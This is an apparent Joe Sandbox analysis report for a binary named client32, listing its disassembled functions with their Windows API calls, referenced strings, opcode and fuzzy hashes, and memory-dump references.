String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
API String ID: 2446111109-1196874063
Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED

Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B

Strings

IPTip_Main_Window, xrefs: 11017423

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698

Function 11045A3D Relevance: 7.9, APIs: 5, Instructions: 414COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 11045CC5
SysFreeString.OLEAUT32(?), ref: 11045D65
SysFreeString.OLEAUT32(?), ref: 11045D74
_memset.LIBCMT ref: 11045DDF
SysFreeString.OLEAUT32(?), ref: 11045E3A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeString$__wcsicoll_memset
String ID:
API String ID: 3719176846-0
Opcode ID: 8131cf87d6aecc1b37c1ba02464cc1c0844a1d2a04b497667613a521c8c12924
Instruction ID: 6b507a42d88c58bf1fd09f083205a3111fe8235063b68b02cbb23f825ce1875c
Opcode Fuzzy Hash: 8131cf87d6aecc1b37c1ba02464cc1c0844a1d2a04b497667613a521c8c12924
Instruction Fuzzy Hash: 7DB11870E00629DFCB21DF59CC84AEAB7B9AF89304F2045D9E54DA7610DB32AE85CF50

Function 11045AE0 Relevance: 7.7, APIs: 5, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 11045CC5
SysFreeString.OLEAUT32(?), ref: 11045D65
SysFreeString.OLEAUT32(?), ref: 11045D74
_memset.LIBCMT ref: 11045DDF
SysFreeString.OLEAUT32(?), ref: 11045E3A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeString$__wcsicoll_memset
String ID:
API String ID: 3719176846-0
Opcode ID: 7cbea54ad129d8e895743a70cc997fe873db698dc09d77d4b276d2db82055a1a
Instruction ID: 60cc3ef52991bc6b342a57b917168051b1b44f0482aae990844c2d38554a078f
Opcode Fuzzy Hash: 7cbea54ad129d8e895743a70cc997fe873db698dc09d77d4b276d2db82055a1a
Instruction Fuzzy Hash: 17A1F870E00629DFCB25DF59CC84ADAB7B9AF89304F2085D9E54DA7610DB32AE85CF50

Function 1106BA00 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 141COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,11182BB8,000000FF,?,1106FC15,?,00000002), ref: 1106BA97
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,11182BB8,000000FF), ref: 1106BB9B

Strings

..\ctl32\Connect.cpp, xrefs: 1106BA72, 1106BB24
c_idata->selcount == 0, xrefs: 1106BB29
session, xrefs: 1106BA77

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: ..\ctl32\Connect.cpp$c_idata->selcount == 0$session
API String ID: 3168844106-15290162
Opcode ID: c9bb0c4312fa677e63521f012cece2d9d1b508bdd8f9589e4a1da8d422a4960a
Instruction ID: d0592b3df726c6a772a8f03967c21ded75058e1cb77db43132a6acb81581dad8
Opcode Fuzzy Hash: c9bb0c4312fa677e63521f012cece2d9d1b508bdd8f9589e4a1da8d422a4960a
Instruction Fuzzy Hash: E8518CB5E006599BCB15CF98D880BDEFBF8FF49318F048169E815AB381D776A944CB90

Function 110698D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,B6DE5DE1), ref: 11069909

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

LeaveCriticalSection.KERNEL32(?,?), ref: 110699DC
LeaveCriticalSection.KERNEL32(?), ref: 11069A07

Strings

Buffers, xrefs: 11069942
Client, xrefs: 11069950

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter__wcstoi64
String ID: Buffers$Client
API String ID: 1723449611-673521604
Opcode ID: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
Instruction ID: 6e52f73104c3b5384aab9ec7da9b21e4f26a08b532b87f3f1e7b4992386e0f41
Opcode Fuzzy Hash: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
Instruction Fuzzy Hash: E1415A75A04209AFDB14CFA8C880B9EF7F9EF88704F20855DE515DB785DB75A901CB90

Function 1103DD20 Relevance: 7.6, APIs: 5, Instructions: 109threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,110B7A30,00000001,00000000,?), ref: 1103DDC2

Part of subcall function 110B47B0: InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,11185C46,000000FF), ref: 110B4835
Part of subcall function 110B47B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,11185C46,000000FF), ref: 110B483F
Part of subcall function 110B47B0: GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,11185C46,000000FF), ref: 110B485A

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1103DE2E
CreateThread.KERNEL32(00000000,00002000,11127210,?,00000000,B6DE5DE1), ref: 1103DE4A
CloseHandle.KERNEL32(00000000), ref: 1103DE51
SetEvent.KERNEL32(?), ref: 1103DE91

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandle$CriticalInitializeSectionThreadVersion_malloc_memsetwsprintf
String ID:
API String ID: 1003535115-0
Opcode ID: 708ffe595cacf51072dca82af28695372aa53b0f2a2f78fd57b9fb6972ad3330
Instruction ID: b65b039bd1a41ddbd0218ab403e2cbb04bef58840103856bc0a67911b04d0048
Opcode Fuzzy Hash: 708ffe595cacf51072dca82af28695372aa53b0f2a2f78fd57b9fb6972ad3330
Instruction Fuzzy Hash: 3B419E74D417159FE720EFA0C888BAEBBF4FB84709F40052DE52A97680DB74B544CBA1

Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,B6DE5DE1,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92

IsWindow.USER32(?), ref: 110CF82B

Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339

RemovePropA.USER32(?), ref: 110CF858
DeleteObject.GDI32(?), ref: 110CF86C
DeleteObject.GDI32(?), ref: 110CF876
DeleteObject.GDI32(?), ref: 110CF880

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 1921910413-0
Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2

Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11081616
wsprintfA.USER32 ref: 1108164D

Strings

..\CTL32\DataStream.cpp, xrefs: 1108165E
%02x, xrefs: 11081610
m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
API String ID: 2111968516-476189988
Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60

Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6

SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
DeleteObject.GDI32(?), ref: 1111F4E4
DeleteObject.GDI32(?), ref: 1111F4F1
DeleteObject.GDI32(?), ref: 1111F516

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$PaletteSelect
String ID:
API String ID: 2820294704-0
Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1

Function 110259C0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110259D7
GetDlgItem.USER32(?,00001399), ref: 11025A11
TranslateMessage.USER32(?), ref: 11025A2A
DispatchMessageA.USER32(?), ref: 11025A34
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025A76

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94

Function 11163964 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11163972

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_free.LIBCMT ref: 11163985

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90

Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
__strdup.LIBCMT ref: 11145277

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Part of subcall function 11145240: _free.LIBCMT ref: 1114529E

_free.LIBCMT ref: 111452AC

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
